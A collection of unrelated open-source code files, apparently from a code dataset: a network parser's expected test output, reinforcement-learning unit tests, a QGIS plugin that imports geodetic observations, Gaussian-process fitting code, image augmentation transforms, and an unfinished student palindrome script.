src/genie/libs/parser/iosxe/tests/ShowPlatformSoftwareFedactiveFnfEtAnalyticsFlows/cli/equal/golden_output_expected.py | balmasea/genieparser | 204 | 12770041 | <reponame>balmasea/genieparser<filename>src/genie/libs/parser/iosxe/tests/ShowPlatformSoftwareFedactiveFnfEtAnalyticsFlows/cli/equal/golden_output_expected.py
expected_output = {'current-eta-records': 0,
'excess-packets-received': 60,
'excess-syn-received': 0,
'total-eta-fnf': 2,
'total-eta-idp': 2,
'total-eta-records': 4,
'total-eta-splt': 2,
'total-packets-out-of-order': 0,
'total-packets-received': 80,
'total-packets-retransmitted': 0}
| 1.039063 | 1 |
tests/unit/bellman/environments/transition_model/keras_models/test_trajectory_sampling.py | RL-Gym/bellman | 40 | 12770042 | <reponame>RL-Gym/bellman<filename>tests/unit/bellman/environments/transition_model/keras_models/test_trajectory_sampling.py<gh_stars>10-100
# Copyright 2021 The Bellman Contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import pytest
import tensorflow as tf
from bellman.environments.mixins import BatchSizeUpdaterMixin
from bellman.environments.transition_model.keras_model.trajectory_sampling import (
InfiniteHorizonTrajectorySampling,
MeanTrajectorySamplingStrategy,
OneStepTrajectorySampling,
)
def test_batch_partition_is_reversible(
trajectory_sampling_strategy_factory, batch_size, ensemble_size
):
strategy = trajectory_sampling_strategy_factory(batch_size, ensemble_size)
starting_tensor = tf.range(batch_size)
input_tensors = strategy.transform_step_inputs([starting_tensor])
output_tensor = strategy.transform_step_outputs(input_tensors)
np.testing.assert_array_equal(output_tensor, starting_tensor)
def test_update_batch_batch_partition_is_reversible(
trajectory_sampling_strategy_factory, batch_size, ensemble_size
):
strategy = trajectory_sampling_strategy_factory(batch_size, ensemble_size)
strategy.update_batch_size(2 * batch_size)
starting_tensor = tf.range(2 * batch_size)
input_tensors = strategy.transform_step_inputs([starting_tensor])
output_tensor = strategy.transform_step_outputs(input_tensors)
np.testing.assert_array_equal(output_tensor, starting_tensor)
def test_batch_partition_is_reversible_within_tf_function(
trajectory_sampling_strategy_factory, batch_size, ensemble_size
):
strategy = trajectory_sampling_strategy_factory(batch_size, ensemble_size)
starting_tensor = tf.range(batch_size, dtype=tf.float32)
@tf.function
def inner_function():
input_tensors = strategy.transform_step_inputs([starting_tensor])
return strategy.transform_step_outputs(input_tensors)
output_tensor = inner_function()
np.testing.assert_array_equal(output_tensor, starting_tensor)
def test_batch_partition_is_consistent_on_input_tensors(
trajectory_sampling_strategy_factory, batch_size, ensemble_size
):
strategy = trajectory_sampling_strategy_factory(batch_size, ensemble_size)
# Set up the values of the tensors such that they are different by scaling the second tensor.
input_tensors = [tf.range(batch_size), batch_size * tf.range(batch_size)]
transformed_input_tensors = strategy.transform_step_inputs(input_tensors)
transformed_input_tensors_iter = iter(transformed_input_tensors)
for tensor_pair in zip(transformed_input_tensors_iter, transformed_input_tensors_iter):
# Scale the values of the first tensor to ensure that the same indices were used to
# partition both input tensors.
np.testing.assert_array_equal(batch_size * tensor_pair[0], tensor_pair[1])
@pytest.fixture(name="fix_random_seed")
def _fix_random_seed_fixture():
global_seed, _ = tf.compat.v1.random.get_seed(None)
tf.random.set_seed(1)
yield
tf.random.set_seed(global_seed)
def test_one_step_trajectory_sampling_resample_indices(fix_random_seed):
batch_size = 5
ensemble_size = 10
strategy = OneStepTrajectorySampling(batch_size, ensemble_size)
input_tensor = tf.range(batch_size)
first_transformed_tensors = strategy.transform_step_inputs([input_tensor])
first_indices = [ind for ind, el in enumerate(first_transformed_tensors) if len(el)]
second_transformed_tensors = strategy.transform_step_inputs([input_tensor])
second_indices = [ind for ind, el in enumerate(second_transformed_tensors) if len(el)]
assert not np.array_equal(first_indices, second_indices)
def test_infinite_horizon_trajectory_sampling_do_not_resample_indices_each_time(batch_size):
ensemble_size = 100
strategy = InfiniteHorizonTrajectorySampling(batch_size, ensemble_size)
input_tensor = tf.range(batch_size)
first_transformed_tensors = strategy.transform_step_inputs([input_tensor])
first_indices = [ind for ind, el in enumerate(first_transformed_tensors) if len(el)]
second_transformed_tensors = strategy.transform_step_inputs([input_tensor])
second_indices = [ind for ind, el in enumerate(second_transformed_tensors) if len(el)]
np.testing.assert_array_equal(first_indices, second_indices)
def test_infinite_horizon_trajectory_sampling_resample_indices(fix_random_seed):
batch_size = 5
ensemble_size = 10
strategy = InfiniteHorizonTrajectorySampling(batch_size, ensemble_size)
input_tensor = tf.range(batch_size)
first_transformed_tensors = strategy.transform_step_inputs([input_tensor])
first_indices = [ind for ind, el in enumerate(first_transformed_tensors) if len(el)]
strategy.train_model()
second_transformed_tensors = strategy.transform_step_inputs([input_tensor])
second_indices = [ind for ind, el in enumerate(second_transformed_tensors) if len(el)]
assert not np.array_equal(first_indices, second_indices)
def test_mean_trajectory_sampling_duplicate_input_tensors(batch_size, ensemble_size):
strategy = MeanTrajectorySamplingStrategy(ensemble_size)
# Set up the values of the tensors such that they are different by scaling the second tensor.
input_tensors = [tf.range(batch_size), batch_size * tf.range(batch_size)]
transformed_input_tensors = strategy.transform_step_inputs(input_tensors)
assert len(transformed_input_tensors) == 2 * ensemble_size
transformed_input_tensors_iter = iter(transformed_input_tensors)
for tensor_pair in zip(transformed_input_tensors_iter, transformed_input_tensors_iter):
np.testing.assert_array_equal(tensor_pair, input_tensors)
def test_mean_trajectory_sampling_transform_outputs(batch_size, ensemble_size):
strategy = MeanTrajectorySamplingStrategy(ensemble_size)
# Specify tensors which will have an integer mean to avoid numerical issues.
output_tensors = [2 * (i + 1) * tf.range(batch_size) for i in range(ensemble_size)]
transformed_output_tensors = strategy.transform_step_outputs(output_tensors)
np.testing.assert_array_equal(
transformed_output_tensors, (ensemble_size + 1) * tf.range(batch_size)
)
| 2.078125 | 2 |
flame/algorithms/import_observationer_by_location.py | busstoptaktik/FIRE | 0 | 12770043 | # -*- coding: utf-8 -*-
from fire.api.model.punkttyper import GeometriObjekt, PunktInformation
__author__ = "Septima"
__date__ = "2019-12-02"
__copyright__ = "(C) 2019 by Septima"
import os
from datetime import datetime
from typing import List, Dict
from PyQt5.QtCore import QCoreApplication
from PyQt5.QtGui import QIcon
from qgis.core import (
QgsProcessing,
QgsFeatureSink,
QgsProcessingAlgorithm,
QgsProcessingParameterFeatureSource,
QgsProcessingParameterFeatureSink,
QgsProcessingParameterString,
QgsProcessingParameterBoolean,
QgsProcessingParameterEnum,
QgsWkbTypes,
QgsFeature,
QgsField,
QgsFields,
QgsProcessingFeedback,
QgsGeometry,
QgsPoint,
QgsProject,
)
from qgis.PyQt.QtCore import Qt, QVariant, QDateTime, QTime
try:
from fire.api import FireDb
except:
FireDb = None
from fire.api.model import Geometry, Observation, Punkt, Koordinat
from .datetime_widget import DateTimeWidget
from .ui.nullable_datetime_wrapper import NullableDateTimeWrapper
import processing
class ImportObservationerByLocationAlgorithm(QgsProcessingAlgorithm):
OUTPUT = "OUTPUT"
INPUT = "INPUT"
OBSERVATION_TYPE = "OBSERVATION_TYPE"
APPLY_THEME = "APPLY_THEME"
FROM_DATE = "FROM_DATE"
TO_DATE = "TO_DATE"
def __init__(self, settings):
QgsProcessingAlgorithm.__init__(self)
self.settings = settings
def initAlgorithm(self, config):
self.addParameter(
QgsProcessingParameterFeatureSource(
self.INPUT,
self.tr("Importér observationer indenfor (within)"),
[QgsProcessing.TypeVectorPolygon],
)
)
self.OBSERVATION_TYPES = [
(1, self.tr("Koteforskel opmålt geometrisk")),
(2, self.tr("Koteforskel opmålt trigonometrisk")),
]
o = QgsProcessingParameterEnum(
name=self.OBSERVATION_TYPE,
description=self.tr("Observationstype"),
options=[x[1] for x in self.OBSERVATION_TYPES],
allowMultiple=True,
defaultValue=[0, 1],
)
o.setMetadata({"widget_wrapper": {"useCheckBoxes": True, "columns": 2}})
self.addParameter(o)
param = QgsProcessingParameterString(
name=self.FROM_DATE, description="Fra Dato", optional=True
)
param.setMetadata({"widget_wrapper": {"class": NullableDateTimeWrapper}})
self.addParameter(param)
param = QgsProcessingParameterString(
name=self.TO_DATE, description="Til Dato", optional=True
)
param.setMetadata({"widget_wrapper": {"class": NullableDateTimeWrapper}})
self.addParameter(param)
self.addParameter(
QgsProcessingParameterFeatureSink(self.OUTPUT, self.tr("Observationer"))
)
self.addParameter(
QgsProcessingParameterBoolean(
self.APPLY_THEME,
self.tr("Anvend standard fikspunktregister-symbologi"),
defaultValue=True,
)
)
def processAlgorithm(self, parameters, context, feedback: QgsProcessingFeedback):
# Input / Output
source = self.parameterAsSource(parameters, self.INPUT, context)
(sink, dest_id) = self.create_output_sink(
parameters, context, source.sourceCrs()
)
# Filter parameters
observation_type_indices = self.parameterAsEnums(
parameters, self.OBSERVATION_TYPE, context
)
observation_types = list(
map(lambda i: self.OBSERVATION_TYPES[i][0], observation_type_indices)
)
from_date = None
from_date_string = self.parameterAsString(parameters, self.FROM_DATE, context)
if from_date_string:
from_date = datetime.fromisoformat(from_date_string)
to_date = None
to_date_string = self.parameterAsString(parameters, self.TO_DATE, context)
if to_date_string:
to_date = datetime.fromisoformat(to_date_string)
fire_connection_string = self.settings.value("fire_connection_string")
fireDb = FireDb(fire_connection_string, debug=True)
features = list(source.getFeatures())
total_num_features = len(features)
total_num_features_processed = 0
# for current, feature in enumerate(features):
for feature in features:
if feedback.isCanceled():
return {}
wkt = feature.geometry().asWkt().upper()
geometry = Geometry(wkt)
observations = fireDb.hent_observationer_naer_geometri(
geometri=geometry, afstand=0, tidfra=from_date, tidtil=to_date
)
pid_list = self.get_pids_from_observations(observations)
geometriobjekter = self.get_geometriobjekter_from_pids(fireDb, pid_list)
idents = self.get_idents_from_pids(fireDb, pid_list)
feedback.setProgressText(
"Fandt {antal} observationer".format(antal=len(observations))
)
feedback.setProgressText(
"Fandt {antal} geometriobjekter".format(antal=len(geometriobjekter))
)
feedback.setProgressText("Fandt {antal} idents".format(antal=len(idents)))
for current, observation in enumerate(observations):
observation_type_id = observation.observationstypeid
if observation_type_id in observation_types:
feature = self.create_feature_from_observation(
observation, geometriobjekter, idents, feedback
)
if feature:
sink.addFeature(feature, QgsFeatureSink.FastInsert)
total_num_features_processed = total_num_features_processed + 1
feedback.setProgress(total_num_features_processed / total_num_features)
if feedback.isCanceled():
return {}
apply_theme = self.parameterAsBool(parameters, self.APPLY_THEME, context)
if apply_theme:
style_file = os.path.join(
os.path.dirname(__file__), "..", "styles", "observation.qml"
)
alg_params = {"INPUT": dest_id, "STYLE": style_file}
processing.run(
"qgis:setstyleforvectorlayer",
alg_params,
context=context,
feedback=feedback,
is_child_algorithm=True,
)
return {self.OUTPUT: dest_id}
def create_output_sink(self, parameters, context, crs):
fields = QgsFields()
fields.append(QgsField("observation_id", QVariant.String))
fields.append(QgsField("observation_type_id", QVariant.Double))
fields.append(QgsField("fikspunkt1_uuid", QVariant.String))
fields.append(QgsField("fikspunkt1_ident", QVariant.String))
fields.append(QgsField("fikspunkt2_uuid", QVariant.String))
fields.append(QgsField("fikspunkt2_ident", QVariant.String))
fields.append(QgsField("registrering_fra", QVariant.DateTime))
fields.append(QgsField("registrering_fra_iso", QVariant.String))
fields.append(QgsField("koteforskel", QVariant.Double))
fields.append(QgsField("nivellementslaengde", QVariant.Double))
fields.append(QgsField("antal_opstillinger", QVariant.Double))
fields.append(QgsField("afstandsafhaengig_varians", QVariant.Double))
fields.append(QgsField("afstandsuafhaengig_varians", QVariant.Double))
fields.append(QgsField("Praecisionsnivellement", QVariant.Double))
(sink, dest_id) = self.parameterAsSink(
parameters, self.OUTPUT, context, fields, QgsWkbTypes.LineString, crs
)
return (sink, dest_id)
def get_pids_from_observations(self, observations: List[Observation]):
pid_list = []
for o in observations:
op_id = o.opstillingspunktid
if op_id not in pid_list: # Point not already found
pid_list.append(op_id)
sp_id = o.sigtepunktid
if sp_id not in pid_list: # Point not already found
pid_list.append(sp_id)
return pid_list
def get_geometriobjekter_from_pids(self, fireDb, pid_list):
# return dict of {punktid: geometriobjekt}
# Get geometriobjekter
gos: List[GeometriObjekt] = (
fireDb.session.query(GeometriObjekt)
.filter(
GeometriObjekt.punktid.in_(pid_list),
GeometriObjekt._registreringtil == None,
)
.all()
)
go_by_pid = {}
for go in gos:
go_by_pid[go.punktid] = go
return go_by_pid
def get_idents_from_pids(self, fireDb, pid_list):
# return dict of {punktid: ident: string}
# GI(346)->GNSS(343)->landsnr(342)->refgeo_id(344)->uuid
info_type_list = [346, 343, 342, 344]
infos: List[PunktInformation] = (
fireDb.session.query(PunktInformation)
.filter(
PunktInformation.punktid.in_(pid_list),
PunktInformation.infotypeid.in_(info_type_list),
)
.order_by(PunktInformation.punktid, PunktInformation.infotypeid)
.all()
)
ident_by_pid = {}
if len(infos) > 0:
current_index = 0
while current_index is not None:
current_info: PunktInformation = infos[current_index]
current_pid = current_info.punktid
ident = self.get_index_ident(current_index, infos)
ident_by_pid[current_pid] = ident
current_index = self.next_index(current_index, infos)
return ident_by_pid
def get_index_ident(self, current_index, infos: List[PunktInformation]):
current_pid = infos[current_index].punktid
best_info = infos[current_index]
best_info_weight = self.get_info_weight(best_info)
inc = 1
while (
current_index + inc < len(infos)
and infos[current_index + inc].punktid == current_pid
):
current_info = infos[current_index + inc]
current_info_weight = self.get_info_weight(current_info)
if current_info_weight > best_info_weight:
best_info = current_info
best_info_weight = current_info_weight
inc = inc + 1
return self.get_ident_text(best_info)
def get_info_weight(self, info: PunktInformation):
if info.infotypeid == 346:
return 4
elif info.infotypeid == 343:
return 3
elif info.infotypeid == 342:
return 2
elif info.infotypeid == 344:
return 1
def get_ident_text(self, info: PunktInformation):
if info.infotypeid == 346:
return "GI:" + info.tekst
elif info.infotypeid == 343:
return "GNSS:" + info.tekst
elif info.infotypeid == 342:
return "landsnr:" + info.tekst
elif info.infotypeid == 344:
return "refgeo_id:" + info.tekst
def next_index(self, current_index, infos: List[PunktInformation]):
current_pid = infos[current_index].punktid
inc = 1
while (
current_index + inc < len(infos)
and infos[current_index + inc].punktid == current_pid
):
inc = inc + 1
if current_index + inc < len(infos):
return current_index + inc
else:
return None
def create_feature_from_observation(
self,
observation: Observation,
geometriobjekter: Dict[str, GeometriObjekt],
idents: Dict[str, str],
feedback: QgsProcessingFeedback,
):
observation_id = observation.objektid
fikspunkt1_id = observation.opstillingspunktid
fikspunkt1_ident = "uuid:" + fikspunkt1_id
if fikspunkt1_id in idents:
fikspunkt1_ident = idents[fikspunkt1_id]
fikspunkt2_id = observation.sigtepunktid
fikspunkt2_ident = "uuid:" + fikspunkt2_id
if fikspunkt2_id in idents:
fikspunkt2_ident = idents[fikspunkt2_id]
geometriobjekt1 = geometriobjekter[fikspunkt1_id]
geometriobjekt2 = geometriobjekter[fikspunkt2_id]
line_geometry = self.create_line_geometry_from_geometriobjekter(
geometriobjekt1, geometriobjekt2, feedback
)
if line_geometry:
# create the feature
fet = QgsFeature()
fet.setGeometry(line_geometry)
# Felter, der skal gemmes på feature:
# [QgsField("observation_id", QVariant.String),
# QgsField("observation_type_id", QVariant.Double)
# QgsField("fikspunkt1_id", QVariant.String),
# QgsField("fikspunkt1_ident", QVariant.String),
# QgsField("fikspunkt2_id", QVariant.String),
# QgsField("fikspunkt2_ident", QVariant.String),
# QgsField("registrering_fra", QVariant.DateTime),
# QgsField("registrering_fra_iso", QVariant.String),
# QgsField("koteforskel", QVariant.Double),
# QgsField("nivellementslaengde", QVariant.Double),
# QgsField("antal_opstillinger", QVariant.Double), Value3
# QgsField("afstandsafhaengig_varians", QVariant.Double), (value5 for id=1, value4 for id=2)
# QgsField("afstandsuafhaengig_varians", QVariant.Double), (value6 for id=1, value5 for id=2)
# QgsField("Praecisionsnivellement", QVariant.Double)], (value7 for id=1, 0 for id=2)
observation_type_id = observation.observationstypeid
registrering_fra = QDateTime(observation.registreringfra)
registrering_fra_iso = registrering_fra.toString(Qt.ISODate)
koteforskel = observation.value1
nivellementslaengde = observation.value2
antal_opstillinger = observation.value3
if observation_type_id == 1:
afstandsafhaengig_varians = observation.value5
afstandsuafhaengig_varians = observation.value6
Praecisionsnivellement = observation.value7
elif observation_type_id == 2:
afstandsafhaengig_varians = observation.value4
afstandsuafhaengig_varians = observation.value5
Praecisionsnivellement = 0
else:
# Observationstypeid > 2
feedback.setProgressText(
"observation_type_id > 2 for observation med id = {id}. Springes over".format(
id=observation_id
)
)
return None
# create the feature
feature = QgsFeature()
feature.setGeometry(line_geometry)
feature.setAttributes(
[
observation_id,
observation_type_id,
fikspunkt1_id,
fikspunkt1_ident,
fikspunkt2_id,
fikspunkt2_ident,
registrering_fra,
registrering_fra_iso,
koteforskel,
nivellementslaengde,
antal_opstillinger,
afstandsafhaengig_varians,
afstandsuafhaengig_varians,
Praecisionsnivellement,
]
)
return feature
else:
# A geometry could not be established
feedback.setProgressText(
"En liniegeometri kunne IKKE opettes for observation med id = {id}".format(
id=observation_id
)
)
return None
def create_line_geometry_from_geometriobjekter(
self,
geometriobjekt1: GeometriObjekt,
geometriobjekt2: GeometriObjekt,
feedback: QgsProcessingFeedback,
):
if geometriobjekt1 and geometriobjekt2:
wkt1 = geometriobjekt1.geometri.wkt
g1 = QgsPoint()
g1.fromWkt(wkt1)
wkt2 = geometriobjekt2.geometri.wkt
g2 = QgsPoint()
g2.fromWkt(wkt2)
geom = QgsGeometry.fromPolyline([g1, g2])
return geom
else:
return None
def name(self):
return "fire-import-observations-location"
def displayName(self):
return "Importér observationer fra FIRE ud fra placering"
def group(self):
return ""
def groupId(self):
return ""
def flags(self):
return QgsProcessingAlgorithm.FlagNoThreading
def tr(self, string):
return QCoreApplication.translate("Processing", string)
def createInstance(self):
return ImportObservationerByLocationAlgorithm(self.settings)
def canExecute(self):
if FireDb is None:
return (
False,
"Dette plugin er afhængigt af API'et til Fikspunktregistret. Se venligst https://github.com/Septima/fire-qgis#installation",
)
fire_connection_string = self.settings.value("fire_connection_string")
if fire_connection_string is None:
conf_message = "Kan ikke finde konfigurationsfil. Se venligst https://github.com/Kortforsyningen/fire-cli#konfigurationsfil for format og placering af konfigurationsfil"
return False, conf_message
else:
try:
fireDb = FireDb(fire_connection_string)
fireDb.hent_observationstyper()
return True, "OK"
except Exception as ex:
str_ex = str(ex)
fire_connection_file_path = self.settings.value(
"fire_connection_file_path"
)
return (
False,
"Fejl i forbindelse til Fikspunktregistret. Se venligst https://github.com/Kortforsyningen/fire-cli#konfigurationsfil for format og indhold af konfigurationsfil. Exception:["
+ str_ex
+ "] Konfigurationsfil:["
+ fire_connection_file_path
+ "]",
)
def shortHelpString(self):
help_string = "Importerer observationer fra Fikstpunktregistret, hvor\n- enten p1 eller p2 er indeholdt i forespørgselsgeometrien,\n- observationstype er som ønsket og\n- registrering-fra ligger indenfor dato-interval (Optionelt)\n\n"
conf_message = ""
fire_connection_string = self.settings.value("fire_connection_string")
if fire_connection_string is None:
conf_message = "Fejl i konfigurationsfil eller kan ikke finde konfigurationsfil. Se venligst https://github.com/Kortforsyningen/fire-cli#konfigurationsfil"
else:
fire_connection_file_path = self.settings.value("fire_connection_file_path")
conf_message = "Konfigurationsfil: " + fire_connection_file_path
return self.tr(help_string + conf_message)
def icon(self):
icon_path = os.path.join(os.path.dirname(__file__), "ui", "fire-export.png")
return QIcon(icon_path)
| 1.804688 | 2 |
leggps/training.py | jacksonloper/leg-gps | 8 | 12770044 | import scipy as sp
import scipy.optimize
from . import legops
import tensorflow as tf
import numpy as np
import numpy.random as npr
from . import constructions
def fit_model_family(ts,xs,model_family,p_init,maxiter=100,use_tqdm_notebook=False):
'''
Fits a custom LEG model
Input:
- ts: list of timestamp-vectors: nsamp x [ragged]
- xs: list of observations: nsamp x [ragged] x n
- model_family: model family to fit
- p_init: -- initial conditions for the parameter vector of the model family
- [optional] maxiter -- max number of iters to use in BFGS
- [optional] use_tqdm_notebook -- whether to make an update bar with tqdm
Output: dictionary with lots of keys. See supplementary.pdf for details. Important keys are:
- message (result of optimization)
- params (a dictionary with keys for each parameter of a LEG model)
- nats (the negative log likelihood divided by the number of observations)
'''
# store initial values
N,R,B,Lambda=model_family.p2NRBL(p_init)
initial_params=dict(N=N.numpy(),R=R.numpy(),B=B.numpy(),Lambda=Lambda.numpy())
# process dedups
time_info=[constructions.dedup_ts(tf.convert_to_tensor(x,dtype=tf.float64)) for x in ts]
xs=[tf.convert_to_tensor(x,dtype=tf.float64) for x in xs]
n=xs[0].shape[1]
nobs = np.sum([np.prod(x.shape) for x in xs])
# functions for scipy.optimize
nats=[]
def func(p):
Ls=0
for x,(sub_ts,sub_idxs) in zip(xs,time_info):
Ls+= model_family.log_likelihood(sub_ts,x,sub_idxs,p)
loss=-Ls.numpy()/nobs
nats.append(loss)
return loss
def jac(p):
gs=0
for x,(sub_ts,sub_idxs) in zip(xs,time_info):
gs+= model_family.informant(sub_ts,x,sub_idxs,p)
return -gs/nobs
# get an initial loss
func(p_init)
# fit it
if use_tqdm_notebook:
import tqdm.notebook
with tqdm.notebook.tqdm() as t:
def callback(*args,**kwargs):
t.update(len(nats))
t.set_description(f"nats={nats[-1]:.2f}")
result=sp.optimize.minimize(func,p_init,jac=jac,options=dict(maxiter=maxiter),callback=callback)
else:
result=sp.optimize.minimize(func,p_init,jac=jac,options=dict(maxiter=maxiter))
# supplement loss dictionary with some stuff of interest
result['nats']=nats
# store initial params
result['initial_params']=initial_params
# store final params:
N,R,B,Lambda=model_family.p2NRBL(result['x'])
result['params']=dict(N=N.numpy(),R=R.numpy(),B=B.numpy(),Lambda=Lambda.numpy())
# we call the parameters "p" not "x"
result['p']=result['x']
del result['x']
# done
return result
def fit(ts,xs,ell=None,N=None,R=None,B=None,Lambda=None,maxiter=100,use_tqdm_notebook=False):
'''
fit the LEG model with rank ell
Input:
- ts: list of timestamp-vectors: nsamp x [ragged]
- xs: list of observations: nsamp x [ragged] x n
- ell: order of the LEG model to fit
- [optional] N,R,B,Lambda -- initial conditions
- [optional] maxiter -- max number of iters to use in BFGS
- [optional] use_tqdm_notebook -- whether to make an update bar with tqdm
Output: dictionary with lots of keys. See supplementary.pdf for details. Important keys are:
- message (result of optimization)
- params (a dictionary with keys for each parameter of a LEG model)
- nats (the negative log likelihood divided by the number of observations)
'''
mf =LEGFamily(ell,xs[0].shape[1])
p_init=mf.get_initial_guess(ts,xs,N=N,R=R,B=B,Lambda=Lambda)
return fit_model_family(ts,xs,mf,p_init,use_tqdm_notebook=use_tqdm_notebook)
r'''
_ _ __ _ _ _
_ __ ___ ___ __| | ___| | / _| __ _ _ __ ___ (_) (_) ___ ___
| '_ ` _ \ / _ \ / _` |/ _ \ | | |_ / _` | '_ ` _ \| | | |/ _ \/ __|
| | | | | | (_) | (_| | __/ | | _| (_| | | | | | | | | | __/\__ \
|_| |_| |_|\___/ \__,_|\___|_| |_| \__,_|_| |_| |_|_|_|_|\___||___/
'''
class LEGFamily:
def __init__(self,ell,n):
self.ell=ell
self.n=n
msk=np.tril(np.ones((self.ell,self.ell)))
self.N_idxs = tf.convert_to_tensor(np.c_[np.where(msk)])
msk=np.tril(np.ones((self.ell,self.ell)),k=-1)
self.R_idxs = tf.convert_to_tensor(np.c_[np.where(msk)])
msk=np.tril(np.ones((self.n,self.n)))
self.Lambda_idxs = tf.convert_to_tensor(np.c_[np.where(msk)])
self.psize = self.N_idxs.shape[0]+self.R_idxs.shape[0]+self.ell*self.n+self.Lambda_idxs.shape[0]
def p2NRBL(self,p):
i=0
# N!
sz=self.N_idxs.shape[0]
N=tf.scatter_nd(self.N_idxs,p[i:i+sz],(self.ell,self.ell))
i+=sz
# R!
sz=self.R_idxs.shape[0]
R=tf.scatter_nd(self.R_idxs,p[i:i+sz],(self.ell,self.ell))
i+=sz
# B!
sz=self.ell*self.n; B = tf.reshape(p[i:i+sz],(self.n,self.ell)); i+=sz
# Lambda!
sz=self.Lambda_idxs.shape[0]
Lambda=tf.scatter_nd(self.Lambda_idxs,p[i:i+sz],(self.n,self.n))
i+=sz
return N,R,B,Lambda
@tf.function(autograph=False)
def informant(self,ts,x,idxs,p):
'''
gradient of log likelihood w.r.t. p
'''
with tf.GradientTape() as g:
g.watch(p)
N,R,B,Lambda = self.p2NRBL(p)
nats = legops.leg_log_likelihood_tensorflow(ts,x,idxs,N,R,B,Lambda)
return g.gradient(nats,p)
@tf.function(autograph=False)
def log_likelihood(self,ts,x,idxs,p):
'''
log likelihood
'''
N,R,B,Lambda = self.p2NRBL(p)
return legops.leg_log_likelihood_tensorflow(ts,x,idxs,N,R,B,Lambda)
def get_initial_guess(self,ts,xs,N=None,R=None,B=None,Lambda=None):
# make up values when nothing is provided
if N is None:
N=np.eye(self.ell)
if R is None:
R=npr.randn(self.ell,self.ell)*.2
R=.5*(R-R.T)
if B is None:
B=np.ones((self.n,self.ell))
B=.5*B/np.sqrt(np.sum(B**2,axis=1,keepdims=True))
if Lambda is None:
Lambda = .1*np.eye(self.n)
# make 'em nice for us
N = tf.linalg.cholesky(N@tf.transpose(N))
R = (R-tf.transpose(R))
Lambda = tf.linalg.cholesky(Lambda@tf.transpose(Lambda))
# put it all together
pN=tf.gather_nd(N,self.N_idxs)
pR=tf.gather_nd(R,self.R_idxs)
pB=tf.reshape(B,(self.n*self.ell,))
pL=tf.gather_nd(Lambda,self.Lambda_idxs)
return tf.concat([pN,pR,pB,pL],axis=0)
class CeleriteFamily(LEGFamily):
def __init__(self,nblocks,n):
self.nblocks=nblocks
self.ell=nblocks*2
self.n=n
msk=np.eye(self.ell,dtype=np.bool) + np.diag(np.tile([True,False],self.nblocks)[:-1],-1)
self.N_idxs = tf.convert_to_tensor(np.c_[np.where(msk)])
msk = np.diag(np.tile([True,False],self.nblocks)[:-1],-1)
self.R_idxs = tf.convert_to_tensor(np.c_[np.where(msk)])
msk=np.tril(np.ones((self.n,self.n)))
self.Lambda_idxs = tf.convert_to_tensor(np.c_[np.where(msk)])
self.psize = self.N_idxs.shape[0]+self.R_idxs.shape[0]+self.ell*self.n+self.Lambda_idxs.shape[0]
def get_initial_guess(self,ts,xs):
N=np.eye(self.ell)
R=npr.randn(self.ell,self.ell)*.2
B=np.ones((self.n,self.ell))
B=.5*B/np.sqrt(np.sum(B**2,axis=1,keepdims=True))
Lambda = .1*np.eye(self.n)
N = tf.linalg.cholesky(N@tf.transpose(N))
R = (R-tf.transpose(R))
Lambda = tf.linalg.cholesky(Lambda@tf.transpose(Lambda))
# put it all together
pN=tf.gather_nd(N,self.N_idxs)
pR=tf.gather_nd(R,self.R_idxs)
pB=tf.reshape(B,(self.n*self.ell,))
pL=tf.gather_nd(Lambda,self.Lambda_idxs)
return tf.concat([pN,pR,pB,pL],axis=0) | 2.265625 | 2 |
aug.py | daaiwusheng/ferattention | 79 | 12770045 | <gh_stars>10-100
import cv2
from torchvision import transforms
from pytvision.transforms import transforms as mtrans
# transformations
#normalize = mtrans.ToMeanNormalization(
# #mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225],
# mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5],
# )
# cifar10
# normalize = mtrans.ToMeanNormalization(
# mean = (0.4914, 0.4822, 0.4465), #[x / 255 for x in [125.3, 123.0, 113.9]],
# std = (0.2023, 0.1994, 0.2010), #[x / 255 for x in [63.0, 62.1, 66.7]],
# )
# cifar100
#normalize = mtrans.ToMeanNormalization(
# mean = [x / 255 for x in [129.3, 124.1, 112.4]],
# std = [x / 255 for x in [68.2, 65.4, 70.4]],
# )
# svhn
#normalize = mtrans.ToMeanNormalization(
# mean = [x / 255 for x in [127.5, 127.5, 127.5]],
# std = [x / 255 for x in [127.5, 127.5, 127.5]],
# )
# normalize = mtrans.ToMeanNormalization(
# mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5],
# )
normalize = mtrans.ToNormalization()
def get_transforms_aug( size_input ):
return transforms.Compose([
#------------------------------------------------------------------
#Resize input
mtrans.ToResize( (48,48 ), resize_mode='square', padding_mode=cv2.BORDER_REFLECT),
#------------------------------------------------------------------
#Colors
#mtrans.ToRandomTransform( mtrans.RandomBrightness( factor=0.25 ), prob=0.50 ),
#mtrans.ToRandomTransform( mtrans.RandomContrast( factor=0.25 ), prob=0.50 ),
#mtrans.ToRandomTransform( mtrans.RandomGamma( factor=0.25 ), prob=0.50 ),
#mtrans.ToRandomTransform( mtrans.RandomRGBPermutation(), prob=0.50 ),
mtrans.ToRandomTransform( mtrans.CLAHE(), prob=0.25 ),
mtrans.ToRandomTransform( mtrans.ToGaussianBlur( sigma=0.005 ), prob=0.25 ),
#------------------------------------------------------------------
#Resize
mtrans.ToResize( (size_input,size_input), resize_mode='square', padding_mode=cv2.BORDER_REFLECT),
#------------------------------------------------------------------
mtrans.ToGrayscale(),
mtrans.ToTensor(),
normalize,
])
def get_transforms_det(size_input):
return transforms.Compose([
mtrans.ToResize( (size_input, size_input), resize_mode='squash', padding_mode=cv2.BORDER_REFLECT ) ,
mtrans.ToGrayscale(),
mtrans.ToTensor(),
normalize,
])
| 2.1875 | 2 |
proj04/proj04.py | scienceman44/SAVY | 0 | 12770046 | # Name:
# Date:
"""
proj04
Asks the user for a string and prints out whether or not the string is a palindrome.
"""
loop_control = True
g = []
p = []
j = raw_input('I am the computer')
h = raw_input('I calculate palindromes')
k = raw_input('I know all')
while loop_control == True:
d = raw_input('type a word for me to calculate')
v = raw_input('calclulating ... %0')
v = raw_input('calclulating ... %17')
v = raw_input('calclulating ... %21')
v = raw_input('calclulating ... %34')
